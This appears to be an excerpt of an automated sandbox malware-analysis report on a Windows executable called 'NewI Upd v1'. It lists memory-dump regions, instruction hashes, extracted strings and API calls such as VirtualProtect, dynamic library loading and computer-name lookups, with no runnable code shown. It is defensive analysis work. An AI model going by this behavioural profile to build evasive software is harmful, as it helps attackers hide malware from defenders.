                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                  • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                  • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                  • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                  Strings
                                                                                  • 690213190D2228369D923F913F8AA6F7, xrefs: 0040E2B8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 690213190D2228369D923F913F8AA6F7
                                                                                  • API String ID: 0-3295789132
                                                                                  • Opcode ID: 03276d07a2122de0223a8a2b95cd246a192901bd24ac87eb402bc8ede7c4cc89
                                                                                  • Instruction ID: 0a523fcd6630e50d0ad9310e04b91ff7ebcd477feab9bc524418dea32313a84d
                                                                                  • Opcode Fuzzy Hash: 03276d07a2122de0223a8a2b95cd246a192901bd24ac87eb402bc8ede7c4cc89
                                                                                  • Instruction Fuzzy Hash: CE517972B006018BD7188F39CC6276BBBA2EFA7324B2D9A7DC596873D6E73854118704
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID: @
                                                                                  • API String ID: 2994545307-2766056989
                                                                                  • Opcode ID: b000e1baa219688d7939f1008ad329f0e235fd7593cd67dfa5c1a830146999d3
                                                                                  • Instruction ID: 37a272e4cdc6d31eb26a80c1c2f23e2555dd0ddaabac5eb098f0c3a0221d7adc
                                                                                  • Opcode Fuzzy Hash: b000e1baa219688d7939f1008ad329f0e235fd7593cd67dfa5c1a830146999d3
                                                                                  • Instruction Fuzzy Hash: E621F0754183049FC310DF19E88066BB7F4FBC9324F14593EE99847310E379A909CB96
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID:
                                                                                  • API String ID: 1029625771-0
                                                                                  • Opcode ID: fa9555f37e9bcad40d15a3753f67ec6437df51a323d621172d23e0a63ee3dbc2
                                                                                  • Instruction ID: 717c868f3874d74d32510f09a371a0cb5341834c92e08ff455240d9d4674e5e9
                                                                                  • Opcode Fuzzy Hash: fa9555f37e9bcad40d15a3753f67ec6437df51a323d621172d23e0a63ee3dbc2
                                                                                  • Instruction Fuzzy Hash: 2ED1B774A01208EFDB44DFA8C985AAEB7B5FF48300F648568F504EB382DA75EE41CB51
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 2bf9a1abd547f570527806fc45f06b18d17dd2f036d5fe9283c30278ecc495bd
                                                                                  • Instruction ID: 998b4ad2999a6568f07d22d3a4e7a3ab1dc1709d67eb6c995c7684baec4336a2
                                                                                  • Opcode Fuzzy Hash: 2bf9a1abd547f570527806fc45f06b18d17dd2f036d5fe9283c30278ecc495bd
                                                                                  • Instruction Fuzzy Hash: 44715736A042055FD715EF28C84067BB3A2EFED350F15943EE8858B362EB389C559389
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 97f55433c743f21062d8074e2e62384338da04d732f7d2539c9287f36ad6d8c9
                                                                                  • Instruction ID: e2ad235ece3f08a2024b9ac1385d87e9008771e68e0456000da657492687b8a7
                                                                                  • Opcode Fuzzy Hash: 97f55433c743f21062d8074e2e62384338da04d732f7d2539c9287f36ad6d8c9
                                                                                  • Instruction Fuzzy Hash: 2E5169306083149FDB28AF24D85173BB791EB99704F15993EDAC68B395EB359C018BCA

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 470 89aa40-89aa86 call 89ac80 call 898900 VirtualProtect 475 89aa88 call 888a70 470->475 476 89aa8d-89aa91 470->476 475->476 477 89aa93-89aab3 call 896cc0 call 87eea0 476->477 478 89aae7-89ab05 call 87eea0 476->478 492 89aae5 477->492 493 89aab5-89aabd call 896cc0 477->493 484 89ab35-89ab52 VirtualProtect 478->484 485 89ab07-89ab0d 478->485 489 89ab59-89ab69 call 898970 484->489 490 89ab54 call 888a70 484->490 485->484 487 89ab0f-89ab32 call 893170 485->487 487->484 499 89ab34 487->499 490->489 492->484 493->492 501 89aabf-89aae2 call 893170 493->501 499->484 501->492 504 89aae4 501->504 504->492
                                                                                  APIs
                                                                                    • Part of subcall function 00898900: EnterCriticalSection.KERNEL32(?,?,00886BD0,00000000,4903A6BA), ref: 0089890F
                                                                                  • VirtualProtect.KERNELBASE(008C2000,00000080,00000004,?), ref: 0089AA79
                                                                                  • VirtualProtect.KERNELBASE(008C2000,00000080,00000002,?), ref: 0089AB45
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: ProtectVirtual$CriticalEnterSection
                                                                                  • String ID: %ls$cached_fp == invalid_function_sentinel()$cached_fp == new_fp$minkernel\crts\ucrt\src\appcrt\internal\winapi_thunks.cpp
                                                                                  • API String ID: 2249083135-1239448957
                                                                                  • Opcode ID: 9c69ed30376910199c349b5c25f886a505f5ef74d9cd1bbdba2e2a71c28655a1
                                                                                  • Instruction ID: 506b5dd8ba12042c3e93b7b516de9e714825ee5f1d44b9182ecb1851d36ce190
                                                                                  • Opcode Fuzzy Hash: 9c69ed30376910199c349b5c25f886a505f5ef74d9cd1bbdba2e2a71c28655a1
                                                                                  • Instruction Fuzzy Hash: D131AB71A40208BBEF14FBA49C46BAE7374FB04704F184518F505E62C2EA749A44CBA3

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 672 40a720-40a736 673 40a740-40a776 672->673 673->673 674 40a778-40a7b8 673->674 675 40a7c0-40a7fc 674->675 675->675 676 40a7fe-40a81f LoadLibraryExW 675->676 677 40a820-40a856 676->677 677->677 678 40a858-40a898 677->678 679 40a8a0-40a8dc 678->679 679->679 680 40a8de-40a8fb LoadLibraryExW 679->680
                                                                                  APIs
                                                                                  • LoadLibraryExW.KERNEL32(871F8513,00000000,$]&'), ref: 0040A806
                                                                                  • LoadLibraryExW.KERNEL32(871F8513,00000000,$]&'), ref: 0040A8E6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID: $]&'$y{
                                                                                  • API String ID: 1029625771-3391858690
                                                                                  • Opcode ID: 17b36d51e0ac5e8904d019b0b3b10d454229c9f459bb54c4a2b95b49de90bb6c
                                                                                  • Instruction ID: e3df6dd21aead34a5ddf479ffdd5a6ce57bb8df0ae66d66699a64dbdd06f65bd
                                                                                  • Opcode Fuzzy Hash: 17b36d51e0ac5e8904d019b0b3b10d454229c9f459bb54c4a2b95b49de90bb6c
                                                                                  • Instruction Fuzzy Hash: 70410872A583418FC314CF66DC8135B7BE1EFD5644F588A3DE5D4AB306C238D9468B89
                                                                                  APIs
                                                                                  • GetComputerNameExA.KERNELBASE(00000006,59243E10,00000100), ref: 0042CBE1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: ComputerName
                                                                                  • String ID: qrax
                                                                                  • API String ID: 3545744682-2273969971
                                                                                  • Opcode ID: cfc1c4edb5714c352d0b7799d246ee133a48a9aa66d1fbdeee6a3e77d77983b9
                                                                                  • Instruction ID: 0167a9b6021f4b487e69d1f3e6896f0ceb7bdb3d7afb1a3d3b8653f417f13fe5
                                                                                  • Opcode Fuzzy Hash: cfc1c4edb5714c352d0b7799d246ee133a48a9aa66d1fbdeee6a3e77d77983b9
                                                                                  • Instruction Fuzzy Hash: 2E31F83160C3A18BD73DCB35A8527EB7EE2AB96304F58486ED4CD97281C7780805C746
                                                                                  APIs
                                                                                  • std::_Timevec::_Timevec.LIBCPMTD ref: 00898CD1
                                                                                  Strings
                                                                                  • minkernel\crts\ucrt\src\appcrt\lowio\osfinfo.cpp, xrefs: 00898CBA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: TimevecTimevec::_std::_
                                                                                  • String ID: minkernel\crts\ucrt\src\appcrt\lowio\osfinfo.cpp
                                                                                  • API String ID: 4219598475-534659383
                                                                                  • Opcode ID: 56b13d9b1d6540fe1b07a5a21e7e72d328017a15b76c36cbcca3d6efb9bcf7f7
                                                                                  • Instruction ID: e29d1c31dc1cbc45d172f79bebeab3683d9052b328dc31dcd14a57762e8b9b05
                                                                                  • Opcode Fuzzy Hash: 56b13d9b1d6540fe1b07a5a21e7e72d328017a15b76c36cbcca3d6efb9bcf7f7
                                                                                  • Instruction Fuzzy Hash: 3F418DB0A04249EBCB14DBA8C591BADBBB1FF55304F244298E415AB3C2DB749F06DB85
                                                                                  APIs
                                                                                  • GetComputerNameExA.KERNELBASE(00000005,?,00000100), ref: 0042CD31
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: ComputerName
                                                                                  • String ID: f]_b
                                                                                  • API String ID: 3545744682-3321007055
                                                                                  • Opcode ID: 63e8941449bdf5ddd9fd9be881f9d855e558bfba7b7becb1fbc36d7e6a866b21
                                                                                  • Instruction ID: 7d6d5cbb6e4fb84516c702973aec74be959b20b533d94bcf0e52b15756506411
                                                                                  • Opcode Fuzzy Hash: 63e8941449bdf5ddd9fd9be881f9d855e558bfba7b7becb1fbc36d7e6a866b21
                                                                                  • Instruction Fuzzy Hash: 6531F73160C7D187C738CF29D4543AFBBE1AB96300F598A6ED8DE9B291D6384805CB96
                                                                                  APIs
                                                                                  • GetComputerNameExA.KERNELBASE(00000006,59243E10,00000100), ref: 0042CBE1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: ComputerName
                                                                                  • String ID: qrax
                                                                                  • API String ID: 3545744682-2273969971
                                                                                  • Opcode ID: a043a667c01180c8ba7fcc8cc39c401d7f63847099e373e9caba9d9b001794bd
                                                                                  • Instruction ID: 9e8df55d72fc4f27b5093f83553ed601aa874f229f263047e210e2eec0278285
                                                                                  • Opcode Fuzzy Hash: a043a667c01180c8ba7fcc8cc39c401d7f63847099e373e9caba9d9b001794bd
                                                                                  • Instruction Fuzzy Hash: 7021F971A0C2A08BD73DCB35A8527EB7EE2AB96304F58496ED4CD97285CB780805CB46
                                                                                  APIs
                                                                                  • GetComputerNameExA.KERNELBASE(00000006,59243E10,00000100), ref: 0042CBE1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: ComputerName
                                                                                  • String ID: qrax
                                                                                  • API String ID: 3545744682-2273969971
                                                                                  • Opcode ID: 55f357b8af4f96e646fe5e1187b562cc3c3eafd99f69352663d02ba7049afee4
                                                                                  • Instruction ID: 69c93b51afbc2c56b05141490a65bd474c0686f8db416358aeb08c4c860a9c5c
                                                                                  • Opcode Fuzzy Hash: 55f357b8af4f96e646fe5e1187b562cc3c3eafd99f69352663d02ba7049afee4
                                                                                  • Instruction Fuzzy Hash: C9210B71A4C3608BD72DCB35A8527EF7AD2ABDA304F58896ED4CD97285C7780806C746
                                                                                  APIs
                                                                                  • GetComputerNameExA.KERNELBASE(00000005,?,00000100), ref: 0042CD31
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: ComputerName
                                                                                  • String ID: f]_b
                                                                                  • API String ID: 3545744682-3321007055
                                                                                  • Opcode ID: d3dc80f6c9128e7c424dd9ab0e4ab253bcf05ad676c5c15958230d0d5b169cad
                                                                                  • Instruction ID: dd750e6c39310e932b229fae9fd23de387e6960b7fd66d11589cb358dcc17d95
                                                                                  • Opcode Fuzzy Hash: d3dc80f6c9128e7c424dd9ab0e4ab253bcf05ad676c5c15958230d0d5b169cad
                                                                                  • Instruction Fuzzy Hash: C621493261C3A047C738CF2594553AFBBE59B86300F1A8A2ED8DED7290D63848058B82
                                                                                  APIs
                                                                                  • GetForegroundWindow.USER32 ref: 0043D5D4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: ForegroundWindow
                                                                                  • String ID: QTUJ
                                                                                  • API String ID: 2020703349-1753559080
                                                                                  • Opcode ID: caa38410d6362b7e2781d24cd048d0fc4bb610ba9aaad93a4a2b8ce0973bae98
                                                                                  • Instruction ID: 12241391e6e0d675f68865a2a455c1658f714c72f69ec7f1b1dc3a4f67ff28e1
                                                                                  • Opcode Fuzzy Hash: caa38410d6362b7e2781d24cd048d0fc4bb610ba9aaad93a4a2b8ce0973bae98
                                                                                  • Instruction Fuzzy Hash: 63F08B76E041208FD7048B38FD1116B7BD1EB9D328F14047DD986E3342FA2AEC004645
                                                                                  APIs
                                                                                  • ___scrt_get_show_window_mode.LIBCMTD ref: 0087CF86
                                                                                    • Part of subcall function 0087DA90: GetStartupInfoW.KERNEL32(?), ref: 0087DAAA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: InfoStartup___scrt_get_show_window_mode
                                                                                  • String ID: =
                                                                                  • API String ID: 2456344720-2322244508
                                                                                  • Opcode ID: 1b67b5579d8329662fb01de1e34a13c1f642e984faacb80c8ed7d16d60ebfcdf
                                                                                  • Instruction ID: dc67808e28f226953d88e1bd541bd7714236f290c9df84b0d6226dfb88c11729
                                                                                  • Opcode Fuzzy Hash: 1b67b5579d8329662fb01de1e34a13c1f642e984faacb80c8ed7d16d60ebfcdf
                                                                                  • Instruction Fuzzy Hash: 0DD05E74D08208BBCB00FFE89903B6EB7B9EF84701F1081A9B948E7285DA305A0047E6
                                                                                  APIs
                                                                                  • CoInitializeEx.OLE32(00000000,00000002), ref: 0040CA2A
                                                                                  • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040CB6F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: Initialize
                                                                                  • String ID:
                                                                                  • API String ID: 2538663250-0
                                                                                  • Opcode ID: 6b5866ac08ddccdaa040d85288ab6eedac2a97b343cd52a6ffb6868d15961427
                                                                                  • Instruction ID: 8e828c29e923620a846d7a117d422454df9fb1543af375fc57d9ca7a34f1b82a
                                                                                  • Opcode Fuzzy Hash: 6b5866ac08ddccdaa040d85288ab6eedac2a97b343cd52a6ffb6868d15961427
                                                                                  • Instruction Fuzzy Hash: 9E41A8B4D10B40AFD370EF399A0B7137EB8AB05250F504B1DF9EA866D4E631A4198BD7
                                                                                  APIs
                                                                                  • LoadLibraryW.KERNELBASE(00000000,00000000,5FBFF111,00000000), ref: 008C0193
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID:
                                                                                  • API String ID: 1029625771-0
                                                                                  • Opcode ID: 4145397a475e41d1b508e212315727e0f51c07c471cf77535c3cdeef071d81e1
                                                                                  • Instruction ID: c3846fe1ce84e31e3b76828b76728673a3700837dcc395d4b93a7d0ecc28803b
                                                                                  • Opcode Fuzzy Hash: 4145397a475e41d1b508e212315727e0f51c07c471cf77535c3cdeef071d81e1
                                                                                  • Instruction Fuzzy Hash: 7A41B824E14248D6EB14DFE4D4407EEB772FF68700F10A42EE109EB3A4E77A4A55C76A
                                                                                  APIs
                                                                                    • Part of subcall function 008BFFF8: LoadLibraryW.KERNELBASE(00000000,00000000,5FBFF111,00000000), ref: 008C0193
                                                                                  • LoadLibraryA.KERNELBASE(008BF9EF,00000000,00000001,5FBFF0FB,?,?,?,?,008BF9EF), ref: 008C04D5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
